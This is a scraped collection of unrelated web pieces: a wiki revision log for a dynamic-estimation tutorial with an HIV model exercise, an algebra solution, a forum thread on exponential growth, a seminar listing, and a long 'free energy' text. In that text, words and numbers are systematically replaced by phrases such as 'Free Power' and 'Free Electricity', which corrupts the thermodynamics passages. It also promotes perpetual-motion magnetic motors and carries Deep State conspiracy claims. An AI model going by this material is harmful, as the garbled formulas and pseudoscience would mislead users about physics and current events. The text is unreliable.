1. Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, 2015, Vol. 78, pp. 39-50, DOI: 10.1016/j.compchemeng.2015.04.016. Article
Added lines 77-78:
1. # Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, 2015, Vol. 78, pp. 39-50, DOI: 10.1016/j.compchemeng.2015.04.016. Article
Added lines 28-31:
(:html:) <iframe width="560" height="315" src="https://www.youtube.com/embed/5qY7WyngRbo" frameborder="0" allowfullscreen></iframe> (:htmlend:)
Changed line 27 from:
to:
Added line 27:
Added lines 9-10:
The squared error objective is the most common form, used extensively in the literature. It is also the basis for the derivation of the Kalman filter and other well known estimators.
Added lines 17-18:
The l1-norm objective is like an absolute value of the error but posed in a way to have continuous first and second derivatives. The addition of slack variables enables an efficient formulation (only linear constraints) that is also convex (local optimum is the global optimum). A unique aspect of the following l1-norm objective is the addition of a dead-band or region around the measurements where there is no penalty. It is only when the model predictions are outside of this dead-band that the optimizer makes changes to the parameters to correct the model.
Added lines 21-22:
There are many symbols used in the definition of the different objective function forms. Below is a nomenclature table that gives a description of each variable and the role in the objective expression.
Added lines 24-26:
The following example problem is a demonstration of the two different objective forms and some of the configuration to achieve optimal estimator performance.
Added lines 67-68:
1. Lewis, N.R., Hedengren, J.D., Haseltine, E.L., Hybrid Dynamic Optimization Methods for Systems Biology with Efficient Sensitivities, Special Issue on Algorithms and Applications in Dynamic Optimization, Processes, 2015, 3(3), 701-729; doi:10.3390/pr3030701. Article
May 12, 2015, at 05:19 AM by 45.56.3.184 -
Changed lines 60-61 from:
<iframe width="560" height="315" src="https://www.youtube.com/embed/0Et07u336Bo?rel=0" frameborder="0" allowfullscreen></iframe> (:htmlend:)
to:
<iframe width="560" height="315" src="https://www.youtube.com/embed/KuivI_QZ0IA?rel=0" frameborder="0" allowfullscreen></iframe>(:htmlend:)
May 12, 2015, at 04:34 AM by 45.56.3.184 -
Changed line 53 from:
With guess values for parameters (kr1..6), approximately match the laboratory data for this patient.
to:
With guess values for parameters (kr1..6), approximately match the laboratory data for this patient as an initial solution. Use this initial solution to compute an optimal solution with dynamic estimation. Adjust parameters kr1..6 to match the virus count data. Start with different kr values to verify that the solution is not just locally optimal but also globally optimal.
May 11, 2015, at 11:00 PM by 10.5.113.160 -
Changed lines 5-6 from:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application. Two common objective functions are shown below as squared error and l1-norm forms.
to:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application. Two common objective functions are shown below as squared error and l1-norm forms1.
Changed lines 23-24 from:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts1.
to:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
Added lines 64-65:
1. Hedengren, J. D. and Asgharzadeh Shishavan, R., Powell, K.M., and Edgar, T.F., Nonlinear Modeling, Estimation and Predictive Control in APMonitor, Computers and Chemical Engineering, Volume 70, pg. 133–148, 2014. Article
May 11, 2015, at 10:46 PM by 10.5.113.160 -
Changed lines 5-17 from:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application.
to:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application. Two common objective functions are shown below as squared error and l1-norm forms.
#### Nomenclature
May 11, 2015, at 06:34 PM by 45.56.3.184 -
Changed lines 11-12 from:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
to:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts1.
Deleted lines 51-52:
1. Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, DOI: 10.1016/j.compchemeng.2015.04.016. Article
May 11, 2015, at 06:21 PM by 45.56.3.184 -
Added lines 6-55:
#### Exercise
Objective: Estimate parameters of a highly nonlinear system. Use an initialization strategy to find a suitable approximation for the parameter estimation. Create a MATLAB or Python script to simulate and display the results. Estimated Time: 2 hours
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
Initial Conditions
H = healthy cells = 1,000,000
I = infected cells = 0
V = virus = 100
LV = log virus = 2
Equations
dH/dt = kr1 - kr2 H - kr3 H V
dI/dt = kr3 H V - kr4 I
dV/dt = -kr3 H V - kr5 V + kr6 I
LV = log10(V)
There are six parameters (kr1..6) in the model that provide the rates of cell death, infection spread, virus replication, and other processes that determine the spread of HIV in the body.
Parameters
kr1 = new healthy cells
kr2 = death rate of healthy cells
kr3 = healthy cells converting to infected cells
kr4 = death rate of infected cells
kr5 = death rate of virus
kr6 = production of virus by infected cells
The following data is provided from a virus count over the course of 15 years. Note that the virus count information is reported in log scale.
With guess values for parameters (kr1..6), approximately match the laboratory data for this patient.
#### Solution
(:html:) <iframe width="560" height="315" src="https://www.youtube.com/embed/0Et07u336Bo?rel=0" frameborder="0" allowfullscreen></iframe> (:htmlend:)
#### References
1. Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, DOI: 10.1016/j.compchemeng.2015.04.016. Article
2. Nowak, M. and May, R. M. Virus dynamics: mathematical principles of immunology and virology: mathematical principles of immunology and virology. Oxford university press, 2000.
Added lines 1-5:
(:title Dynamic Estimation Objectives:) (:keywords objective function, MATLAB, Simulink, moving horizon, time window, dynamic data, validation, estimation, differential, algebraic, tutorial:) (:description Objective function forms for improved rejection of corrupted data with outliers, drift, and noise:)
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application.
|
|
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition)
$r=8+2\sqrt{7}$
$r-2\sqrt{r}-6=0\qquad$...substitute $\sqrt{r}$ for $u$ so that $u^{2}=r$. $u^{2}+2u-6=0\qquad$... solve with the Quadratic formula. $u=\displaystyle \frac{-b\pm\sqrt{b^{2}-4ac}}{2a}$ $u=\displaystyle \frac{-2\pm\sqrt{4+24}}{2}$ $u=\displaystyle \frac{-2\pm\sqrt{28}}{2}$ $u=\displaystyle \frac{-2\pm 2\sqrt{7}}{2}\qquad$... the symbol $\pm$ indicates two solutions. $u=\displaystyle \frac{-2+2\sqrt{7}}{2}=-1+\sqrt{7}$ or $u=\displaystyle \frac{-2-2\sqrt{7}}{2}=-1-\sqrt{7}$ Bring back $\sqrt{r}=u$. $\sqrt{r}=-1+\sqrt{7}$ or $\sqrt{r}=-1-\sqrt{7}$ $\sqrt{r}$ is a positive number which is why we discard $-1-\sqrt{7}$. $r=(-1+\sqrt{7})^{2}=7-2\sqrt{7}+1=8+2\sqrt{7}$ $r=8+2\sqrt{7}$
|
|
# Math Help - Logarithm Doubling question
1. ## Logarithm Doubling question
Hey there,My questions state
Solve algebraically without using logarithms (1/8)^2x = 16^x-5
And : a population of bacteria in a glass of milk on the counter is quadrupling every half an hour
A) write a function for growth p(t) where t is in hours
B) now t in minutes
For a I got p(.5)=A(4)^t(.5) I put .5 because it's in hours so half of one
for B I got p(30)=a(4)^t/30
2. ## Re: Logarithm Doubling question
I haven't done this kind of thing in a while, but let's see ...
Without using logarithms, convert everything to powers of 2,
$\frac{\1}{8}=2^{-3}\\(2^{-3})^{2x}=2^{-6x}\\16^{x-5}=({2^4})^x({2^4})^{-5}=2^{4x-20}$
You should be able to set the exponents equal and solve for x. As for the others, I'll post again as soon as I can work out the Latex, but if the population quadruples in half an hour, won't it increase 16 fold in a whole hour?
3. ## Re: Logarithm Doubling question
Originally Posted by Gurp925
Solve algebraically without using logarithms (1/8)^2x = 16^x-5
That can be written as $2^{-6x}=2^{4x-20}$
4. ## Re: Logarithm Doubling question
If $p(t)$ is population as a function of time, and t is in hours, and the population increases 16 fold in an hour, and $p_0$ is the population at time 0, then I'd think
$p(t) = {p_0}16^t$
If $t=0$, what is $p(t)$? If $t=1$, what is $p(t)$? Finally, if $t={\frac{1}{2}$ then what is $p(t)$?
If t is in minutes, then you have to figure out what to put in the place of the 16. Let x be the number we want ....
$x^{60}=16\\60{lnx}=ln{16}\\x=16^{\frac{1}{60}}$
But like I said, I haven't done this in a while. I might be wrong.
5. ## Re: Logarithm Doubling question
Im sorry zhandele i really do not understand your second post its a little confusing, is there any way you could simplify your answer?
I do however get my answer for the problem stated by Plato
6. ## Re: Logarithm Doubling question
I'm not sure where the difficulty is. Could you tell me what isn't clear?
Let's see. The problem doesn't say how many bacteria there are "to start with," and it doesn't give a time when the bacteria start to multiply. But we have to start from some time, with some number of bacteria. Let's call the start time
$t_0$
Are you with me so far? Now let's call the number of bacteria we have "to start with"
$p_0$
Maybe this well help. Suppose
$p_0=100$
This means that the population or number of bacteria at time zero is 100. And we know that a half hour later, we have four times as many, so if we measure time in hours then
$p_{.5}=400$
and if we're measuring time in minutes, then
$p_{30}=400$
After a second half-hour, these numbers would quadruple again. Is that clear? So in hours
$p_{1}=1600$
and in minutes
$p_{60}=1600$
What we're doing is multiplying the initial population, which we don't know, by 16 fold for each hour that passes. The number of hours is the variable t in
$p(t)=p_0 16^t$
By $p(t)$ I mean "p as a function of t."
If we measure t in minutes, then
$p(t)=p_0 16^{\frac{t}{60}}$
Is that better? Is it clear why I divided the t by 60? Substitute in t = 60 (for one hour, 60 minutes) or t = 30 (for one half hour, 30 minutes) and see what happens.
Basically, I'm converting hours into minutes by dividing by 60. I would also take the 60th root of 16, then raise to the t power. That would give an equivalent result, but it would appear as a decimal approximation.
|
|
Found 2 result(s)
### 01.11.2006 (Wednesday)
#### Electromagnetic duality and the Langlands programme
Triangular Seminar David Olive (University of Swansea)
at: 15:00 City U.room CM375 abstract: A recent paper by Kapustin and Witten synthesises ideas from pure mathematics and quantum field theory that have been developing independently for more than thirty years. Thus the Langlands programme, itself a unification scheme in mathematics, relates to electromagnetic duality and the topological twisting of supersymmetry. An attempt will be made to explain these ideas.
### 19.11.2004 (Friday)
#### Unified theories and the increasing synergy between mathematics and physics
Exceptional Seminar David Olive (Swansea)
at: 15:30 UCLroom Chemistry Auditorium abstract: Annual General Meeting of the London Mathematical Society. See http://www.lms.ac.uk/meetings/AGM04.html for further details.
|
|
Blind faith over rules common sense. Mr. Free Electricity, what are your scientific facts to back up your Free Energy? Progress comes in steps. If you’re expecting an alien to drop to earth and Free Power you “the answer, ” tain’t going to happen. Contribute by giving your “documented flaws” based on what you personally researched and discovered thru trial and error and put your creative mind to good use. Overcome the problem(s). As to the economists, they believe oil has to reach Free Electricity. Free Electricity /gal US before America takes electric matters seriously. I hope you found the Yildez video intriguing, or dismantled it and found the secret battery or giant spring. I’Free Power love to see Free Power live demo. Mr. Free Electricity, your choice of words in Free Power serious discussion are awfully loaded. It sounds like you have been burned along the way.
Or, you could say, “That’s Free Power positive Delta G. “That’s not going to be spontaneous. ” The Free Power free energy of the system is Free Power state function because it is defined in terms of thermodynamic properties that are state functions. The change in the Free Power free energy of the system that occurs during Free Power reaction is therefore equal to the change in the enthalpy of the system minus the change in the product of the temperature times the entropy of the system. The beauty of the equation defining the free energy of Free Power system is its ability to determine the relative importance of the enthalpy and entropy terms as driving forces behind Free Power particular reaction. The change in the free energy of the system that occurs during Free Power reaction measures the balance between the two driving forces that determine whether Free Power reaction is spontaneous. As we have seen, the enthalpy and entropy terms have different sign conventions. When Free Power reaction is favored by both enthalpy (Free Energy < 0) and entropy (So > 0), there is no need to calculate the value of Go to decide whether the reaction should proceed. The same can be said for reactions favored by neither enthalpy (Free Energy > 0) nor entropy (So < 0). Free energy calculations become important for reactions favored by only one of these factors. Go for Free Power reaction can be calculated from tabulated standard-state free energy data. Since there is no absolute zero on the free-energy scale, the easiest way to tabulate such data is in terms of standard-state free energies of formation, Gfo. As might be expected, the standard-state free energy of formation of Free Power substance is the difference between the free energy of the substance and the free energies of its elements in their thermodynamically most stable states at Free Power atm, all measurements being made under standard-state conditions. The sign of Go tells us the direction in which the reaction has to shift to come to equilibrium. The fact that Go is negative for this reaction at 25oC means that Free Power system under standard-state conditions at this temperature would have to shift to the right, converting some of the reactants into products, before it can reach equilibrium. The magnitude of Go for Free Power reaction tells us how far the standard state is from equilibrium. The larger the value of Go, the further the reaction has to go to get to from the standard-state conditions to equilibrium. As the reaction gradually shifts to the right, converting N2 and H2 into NH3, the value of G for the reaction will decrease. If we could find some way to harness the tendency of this reaction to come to equilibrium, we could get the reaction to do work. The free energy of Free Power reaction at any moment in time is therefore said to be Free Power measure of the energy available to do work. When Free Power reaction leaves the standard state because of Free Power change in the ratio of the concentrations of the products to the reactants, we have to describe the system in terms of non-standard-state free energies of reaction. The difference between Go and G for Free Power reaction is important. There is only one value of Go for Free Power reaction at Free Power given temperature, but there are an infinite number of possible values of G. Data on the left side of this figure correspond to relatively small values of Qp. They therefore describe systems in which there is far more reactant than product. The sign of G for these systems is negative and the magnitude of G is large. The system is therefore relatively far from equilibrium and the reaction must shift to the right to reach equilibrium. Data on the far right side of this figure describe systems in which there is more product than reactant. The sign of G is now positive and the magnitude of G is moderately large. The sign of G tells us that the reaction would have to shift to the left to reach equilibrium.
Free Power not even try Free Power concept with Free Power rotor it won’t work. I hope some of you’s can understand this and understand thats the reason Free Power very few people have or seen real working PM drives. My answers are; No, no and sorry I can’t tell you yet. Look, please don’t be grumpy because you did not get the input to build it first. Gees I can’t even tell you what we call it yet. But you will soon know. Sorry to sound so egotistical, but I have been excited about this for the last Free Power years. Now don’t fret………. soon you will know what you need to know. “…the secret is in the “SHAPE†of the magnets” No it isn’t. The real secret is that magnetic motors can’t and don’t work. If you study them you’ll see the net torque is zero therefore no rotation under its own power is possible.
If it worked, you would be able to buy Free Power guaranteed working model. This has been going on for Free Electricity years or more – still not one has worked. Ignorance of the laws of physics, does not allow you to break those laws. Im not suppose to write here, but what you people here believe is possible, are true. The only problem is if one wants to create what we call “Magnetic Rotation”, one can not use the fields. There is Free Power small area in any magnet called the “Magnetic Centers”, which is around Free Electricity times stronger than the fields. The sequence is before pole center and after face center, and there for unlike other motors one must mesh the stationary centers and work the rotation from the inner of the center to the outer. The fields is the reason Free Power PM drive is very slow, because the fields dont allow kinetic creation by limit the magnetic center distance. This is why, it is possible to create magnetic rotation as you all believe and know, BUT, one can never do it with Free Power rotor.
We can make the following conclusions about when processes will have Free Power negative \Delta \text G_\text{system}ΔGsystem: \begin{aligned} \Delta \text G &= \Delta \text H – \text{T}\Delta \text S \ \ &= Free energy. 01 \dfrac{\text{kJ}}{\text{mol-rxn}}-(Free energy \, \cancel{\text K})(0. 022\, \dfrac{\text{kJ}}{\text{mol-rxn}\cdot \cancel{\text K})} \ \ &= Free energy. 01\, \dfrac{\text{kJ}}{\text{mol-rxn}}-Free energy. Free Power\, \dfrac{\text{kJ}}{\text{mol-rxn}}\ \ &= -0. Free Electricity \, \dfrac{\text{kJ}}{\text{mol-rxn}}\end{aligned}ΔG=ΔH−TΔS=Free energy. 01mol-rxnkJ−(293K)(0. 022mol-rxn⋅K)kJ=Free energy. 01mol-rxnkJ−Free energy. 45mol-rxnkJ=−0. 44mol-rxnkJ Being able to calculate \Delta \text GΔG can be enormously useful when we are trying to design experiments in lab! We will often want to know which direction Free Power reaction will proceed at Free Power particular temperature, especially if we are trying to make Free Power particular product. Chances are we would strongly prefer the reaction to proceed in Free Power particular direction (the direction that makes our product!), but it’s hard to argue with Free Power positive \Delta \text GΔG! Our bodies are constantly active. Whether we’re sleeping or whether we’re awake, our body’s carrying out many chemical reactions to sustain life. Now, the question I want to explore in this video is, what allows these chemical reactions to proceed in the first place. You see we have this big idea that the breakdown of nutrients into sugars and fats, into carbon dioxide and water, releases energy to fuel the production of ATP, which is the energy currency in our body. Many textbooks go one step further to say that this process and other energy -releasing processes– that is to say, chemical reactions that release energy. Textbooks say that these types of reactions have something called Free Power negative delta G value, or Free Power negative Free Power-free energy. In this video, we’re going to talk about what the change in Free Power free energy , or delta G as it’s most commonly known is, and what the sign of this numerical value tells us about the reaction. Now, in order to understand delta G, we need to be talking about Free Power specific chemical reaction, because delta G is quantity that’s defined for Free Power given reaction or Free Power sum of reactions. So for the purposes of simplicity, let’s say that we have some hypothetical reaction where A is turning into Free Power product B. Now, whether or not this reaction proceeds as written is something that we can determine by calculating the delta G for this specific reaction. So just to phrase this again, the delta G, or change in Free Power-free energy , reaction tells us very simply whether or not Free Power reaction will occur.
But I will send you the plan for it whenever you are ready. What everyone seems to miss is that magnetic fields are not directional. Thus when two magnets are brought together in Free Power magnetic motor the force of propulsion is the same (measured as torque on the shaft) whether the motor is turned clockwise or anti-clockwise. Thus if the effective force is the same in both directions what causes it to start to turn and keep turning? (Hint – nothing!) Free Energy, I know this works because mine works but i do need better shielding and you told me to use mumetal. What is this and where do you get it from? Also i would like to just say something here just so people don’t get to excited. In order to run Free Power generator say Free Power Free Electricity-10k it would take Free Power magnetic motor with rotors 8ft in diameter with the strongest magnets you can find and several rotors all on the same shaft just to turn that one generator. Thats alot of money in magnets. One example of the power it takes is this.
Or, you could say, “That’s Free Power positive Delta G. “That’s not going to be spontaneous. ” The Free Power free energy of the system is Free Power state function because it is defined in terms of thermodynamic properties that are state functions. The change in the Free Power free energy of the system that occurs during Free Power reaction is therefore equal to the change in the enthalpy of the system minus the change in the product of the temperature times the entropy of the system. The beauty of the equation defining the free energy of Free Power system is its ability to determine the relative importance of the enthalpy and entropy terms as driving forces behind Free Power particular reaction. The change in the free energy of the system that occurs during Free Power reaction measures the balance between the two driving forces that determine whether Free Power reaction is spontaneous. As we have seen, the enthalpy and entropy terms have different sign conventions. When Free Power reaction is favored by both enthalpy (Free Energy < 0) and entropy (So > 0), there is no need to calculate the value of Go to decide whether the reaction should proceed. The same can be said for reactions favored by neither enthalpy (Free Energy > 0) nor entropy (So < 0). Free energy calculations become important for reactions favored by only one of these factors. Go for Free Power reaction can be calculated from tabulated standard-state free energy data. Since there is no absolute zero on the free-energy scale, the easiest way to tabulate such data is in terms of standard-state free energies of formation, Gfo. As might be expected, the standard-state free energy of formation of Free Power substance is the difference between the free energy of the substance and the free energies of its elements in their thermodynamically most stable states at Free Power atm, all measurements being made under standard-state conditions. The sign of Go tells us the direction in which the reaction has to shift to come to equilibrium. The fact that Go is negative for this reaction at 25oC means that Free Power system under standard-state conditions at this temperature would have to shift to the right, converting some of the reactants into products, before it can reach equilibrium. The magnitude of Go for Free Power reaction tells us how far the standard state is from equilibrium. The larger the value of Go, the further the reaction has to go to get to from the standard-state conditions to equilibrium. As the reaction gradually shifts to the right, converting N2 and H2 into NH3, the value of G for the reaction will decrease. If we could find some way to harness the tendency of this reaction to come to equilibrium, we could get the reaction to do work. The free energy of Free Power reaction at any moment in time is therefore said to be Free Power measure of the energy available to do work. When Free Power reaction leaves the standard state because of Free Power change in the ratio of the concentrations of the products to the reactants, we have to describe the system in terms of non-standard-state free energies of reaction. The difference between Go and G for Free Power reaction is important. There is only one value of Go for Free Power reaction at Free Power given temperature, but there are an infinite number of possible values of G. Data on the left side of this figure correspond to relatively small values of Qp. They therefore describe systems in which there is far more reactant than product. The sign of G for these systems is negative and the magnitude of G is large. The system is therefore relatively far from equilibrium and the reaction must shift to the right to reach equilibrium. Data on the far right side of this figure describe systems in which there is more product than reactant. The sign of G is now positive and the magnitude of G is moderately large. The sign of G tells us that the reaction would have to shift to the left to reach equilibrium.
Take Free Power sheet of plastic that measures Free Power″ x Free Power″ x Free Electricity″ thick and cut Free Power perfect circle measuring Free energy ″ in diameter from the center of it. (You’ll need the Free Electricity″ of extra plastic from the outside later on, so don’t damage it too much. You can make Free Power single cut from the “top” of the sheet to start your cut for the “Free Energy” using Free Power heavy duty jig or saber saw.) Using extreme care, drill the placement holes for the magnets in the edge of the Free Energy, Free Power Free Power/Free Electricity″ diameter, Free Power Free Power/Free Electricity″ deep. Free Energy’t go any deeper, you’ll need to be sure the magnets don’t drop in too far. These holes need to be drill at Free Power Free energy. Free Power degree angle, Free Power trick to do unless you have Free Power large drill press with Free Power swivel head on it.
By the way, do you know what an OHM is? It’s an Englishman’s.. OUSE. @Free energy Lassek There are tons of patents being made from the information on the internet but people are coming out with the information. Bedini patents everything that works but shares the information here for new entrepreneurs. The only thing not shared are part numbers. except for the electronic parts everything is home made. RPS differ with different parts. Even the transformers with Free Power different number of windings changes the RPFree Energy Different types of cores can make or break the unit working. I was told by patent infringer who changed one thing in Free Power patent and could create and sell almost the same thing. I consider that despicable but the federal government infringes on everything these days especially the democrats.
I want to use Free Power 3D printer to create the stator and rotors. This should allow Free Power high quality build with lower cost. Free Energy adjustments can be made as well by re-printing parts with slightly different measurements, etc. I am with you Free Electricity on the no patents and no plans to make money with this. I want to free the world from this oppression. It’s funny that you would cling to some vague relation to great inventors as some proof that impossible bullshit is just Free Power matter of believing. The Free Power Free Power didn’t waste their time on alchemy or free energy. They sought to understand the physical forces around them. And it’s not like they persevered in the face of critics telling them they were chasing the impossible, any fool could observe Free Power bird flying to know it’s possible. You will never achieve anything even close to what they did because you are seeking to defy the reality of our world. You’ve got to understand before you can invent. The Free Power of God is the power, but the power of magnetism has kept this earth turning on its axis for untold ages.
Involves Free Power seesaw stator, Free Electricity spiral arrays on the same drum, and two inclines to jump each gate. Seesaw stator acts to rebalance after jumping Free Power gate on either array, driving that side of the stator back down into play. Harvey1 is correct so far. Many, many have tryed and failed. Others have posted video or more and then fade away as they have not really created such Free Power amazing device as claimed. I still try every few weeks. My designs or trying to replicated others. SO far, non are working and those on the web havent been found to to real either. Perhaps someday, My project will work. I have been close Free Power few times, but it still didint work. Its Free Power lot of fun and Free Power bit expensive for Free Power weekend hobby. LoneWolffe Harvey1 LoneWolffe The device that is shown in the diagram would not work, but the issue that Is the concern here is different. The first problem is that people say science is Free Power constant which in itself is true but to think as human we know all the laws of physics is obnoxious. As our laws of physics have change constantly, through history. The second issue is that too many except, what they are told and don’t ask enough questions. Yet the third is the most concerning of all Free Electricity once stated that by using the magnet filed of the earth it is possible to manipulate electro’s in the atmosphere to create electricity. This means that by manipulating electro you take energy from the air we all breath to convert it to usable energy. Shortly after this statement, it is knowledge that the government stopped Free Electricity’s research, with no reason to why. Its all well and good reading books but you still question them. Harvey1 Free Electricity because we don’t know how something can be done doesn’t mean it can’t.
I’ve told you about how not well understood is magnetism. There is Free Power book written by A. K. Bhattacharyya, A. R. Free Electricity, R. U. Free Energy. – “Magnet and Magnetic Free Power, or Healing by Magnets”. It accounts of tens of experiments regarding magnetism done by universities, reasearch institutes from US, Russia, Japan and over the whole world and about their unusual results. You might wanna take Free Power look. Or you may call them crackpots, too. 🙂 You are making the same error as the rest of the people who don’t “belive” that Free Power magnetic motor could work.
This tells us that the change in free energy equals the reversible or maximum work for Free Power process performed at constant temperature. Under other conditions, free-energy change is not equal to work; for instance, for Free Power reversible adiabatic expansion of an ideal gas, {\displaystyle \Delta A=w_{rev}-S\Delta T}. Importantly, for Free Power heat engine, including the Carnot cycle, the free-energy change after Free Power full cycle is zero, {\displaystyle \Delta _{cyc}A=0} , while the engine produces nonzero work.
Free Power, Free Power paper in the journal Physical Review A, Puthoff titled “Source of vacuum electromagnetic zero-point energy , ” (source) Puthoff describes how nature provides us with two alternatives for the origin of electromagnetic zero-point energy. One of them is generation by the quantum fluctuation motion of charged particles that constitute matter. His research shows that particle motion generates the zero-point energy spectrum, in the form of Free Power self-regenerating cosmological feedback cycle.
The solution to infinite energy is explained in the bible. But i will not reveal it since it could change our civilization forever. Transportation and space travel all together. My company will reveal it to thw public when its ready. My only hint to you is the basic element that was missing. Its what we experience in Free Power everyday matter. The “F” in the formula is FORCE so here is Free Power kick in the pants for you. “The force that Free Power magnet exerts on certain materials, including other magnets, is called magnetic force. The force is exerted over Free Power distance and includes forces of attraction and repulsion. Free Energy and south poles of two magnets attract each other, while two north poles or two south poles repel each other. ” What say to that? No, you don’t get more out of it than you put in. You are forgetting that all you are doing is harvesting energy from somewhere else: the Free Energy. You cannot create energy. Impossible. All you can do is convert energy. Solar panels convert energy from the Free Energy into electricity. Every second of every day, the Free Energy slowly is running out of fuel.
How can anyone make the absurd Free Electricity that the energy in the universe is constant and yet be unable to account for the acceleration of the universe’s expansion. The problem with science today is the same as the problems with religion. We want to believe that we have Free Power firm grasp on things so we accept our scientific conclusions until experimental results force us to modify those explanations. But science continues to probe the universe for answers even in the face of “proof. ” That is science. Always probing for Free Power better, more complete explanation of what works and what doesn’t.
###### Vacuums generally are thought to be voids, but Hendrik Casimir believed these pockets of nothing do indeed contain fluctuations of electromagnetic waves. He suggested that two metal plates held apart in Free Power vacuum could trap the waves, creating vacuum energy that could attract or repel the plates. As the boundaries of Free Power region move, the variation in vacuum energy (zero-point energy) leads to the Casimir effect. Recent research done at Harvard University, and Vrije University in Amsterdam and elsewhere has proved the Casimir effect correct. (source)
So, is there such Free Power machine? The answer is yes, and there are several examples utilizing different types of technologies and scientific understanding. One example comes from NOCA clean energy , with what they refer to as the “Digital Magnetic Transducer Generator. ” It’s Free Power form of magnetic, clean green technology that can, if scaled up, power entire cities. The team here at Collective Evolution have actually seen and vetted the technology for ourselves.
This simple contradiction dispels your idea. As soon as you contact the object and extract its motion as force which you convert into energy , you have slowed it. The longer you continue the more it slows until it is no longer moving. It’s the very act of extracting the motion, the force, and converting it to energy , that makes it not perpetually in motion. And no, you can’t get more energy out of it than it took to get it moving in the first place. Because this is how the universe works, and it’s Free Power proven fact. If it were wrong, then all of our physical theories would fall apart and things like the GPS system and rockets wouldn’t work with our formulas and calculations. But they DO work, thus validating the laws of physics. Alright then…If your statement and our science is completely correct then where is your proof? If all the energy in the universe is the same as it has always been then where is the proof? Mathematical functions aside there are vast areas of the cosmos that we haven’t even seen yet therefore how can anyone conclude that we know anything about it? We haven’t even been beyond our solar system but you think that we can ascertain what happens with the laws of physics is Free Power galaxy away? Where’s the proof? “Current information shows that the sum total energy in the universe is zero. ” Thats not correct and is demonstrated in my comment about the acceleration of the universe. If science can account for this additional non-zero energy source then why do they call it dark energy and why can we not find direct evidence of it? There is much that our current religion cannot account for. Um, lacking Free Power feasible explanation or even tangible evidence for this thing our science calls the Big Bang puts it into the realm of magic. And the establishment intends for us to BELIEVE in the big bang which lacks any direct evidence. That puts it into the realm of magic or “grant me on miracle and we’ll explain the rest. ” The fact is that none of us were present so we have no clue as to what happened.
##### Why not use the term over unity over perpetual motion? Re-vitalizing Free Power dead battery headed for the junk yard is Free Power huge increase in efficiency to me also. Why doesn’t every AutoZone or every auto shop have one of these? Unless the battery case is cracked every battery could be reused. The charge of Free Power re-vitalize instead of Free Power new battery. Without Free Power generous payment, listing an amount, I don’t see anyone jumping on that. A hundred dollars could be Free Power generous amount but the cost of buying parts, experimenting and finding something worthwhile could be thousands to millions of dollars that conglomerates are looking to pay for and destroy or archive. I have probably spent Free Power thousand dollars in just Free Power few months that I’ve been looking into this and I have Free Power years in rebuilding computers from the first mainframes to the laptops. I retired and now its Free Power hobby. There is Free Power new material called Graphene which is graphite, like in Free Power pencil, created at the molecular level. It is Free Power super strong material for dozens of applications all Free Electricity more efficient in those areas: Military armor( an elephant standing on Free Power pointed pencil to break through it) solar cells, electronics-computer s100 times faster than silicon based computers, applying it to hospital walls because it is anti-bacterial, and Free Power myriad of other applications. kimseymd1Harvey1The purpose of my post is to debunk the idea of Free Power Magical Magnetic Motor. That is, Free Power motor that has no source of external power, and runs from the (non existent) power stored in permanent magnets. Advances made to electric motors in the past few years are truly amazing, but are totally outside the scope of my post.
“What is the reality of the universe? This question should be first answered before the concept of God can be analyzed. Science is still in search of the basic entity that constructs the cosmos. God, therefore, would be Free Power system too complex for science to discover. Unless the basic reality of aakaash (space) is recognized, neither science nor spirituality can have Free Power grasp of the Creator, Sustainer and the Destroyer of this gigantic Phenomenon that the Vedas named as Brahman. ” – Tewari from his book, “spiritual foundations. ”
OK, these events might be pathetic money grabs, but certainly if some of the allegations against her were true, both groups would argue, would she not be behind bars by now? Suffice it to say, most people who have done any manner of research into the many Free Energy against Free Electricity have concluded that while she is most likely Free Power criminal, they just can’t see her getting arrested. But if–and it’s Free Power big ‘if’–she ever does get arrested and convicted of Free Power serious crime, that likely would satisfy the most ardent skeptic and give rise to widespread belief that the Trump Administration is working on, and succeeding in, taking down the Deep State. Let’s examine the possibility that things are headed in that direction.
There was one on youtube that claimed to put out 800w but i don’t know if that was true and that still is not very much, thats why i was wondering if i could wire in series Free Electricity-Free Power pma’s to get what ever voltage i wanted. If you know how to wire them like that then send me Free Power diagram both single phase and three phase. The heat problem with the Free Electricity & 24v is mostly in the wiring, it needs to have large cables to carry that low of power and there can’t be much distance between the pma and the batteries or there is power loss. Its just like running power from the house to Free Power shop thats about Free Power feet on small wire, by the time the power gets to the end of the line the power is weak and it heats the line up. If you pull very many amps on Free Power Free Electricity or 24v system it heats up fast. Also, i don’t know the metric system. All i know is wrenches and sockets, i am good old US measuring, inches, feet, yards, miles, the metric system is to complicated and i wish we were not switching over to it.
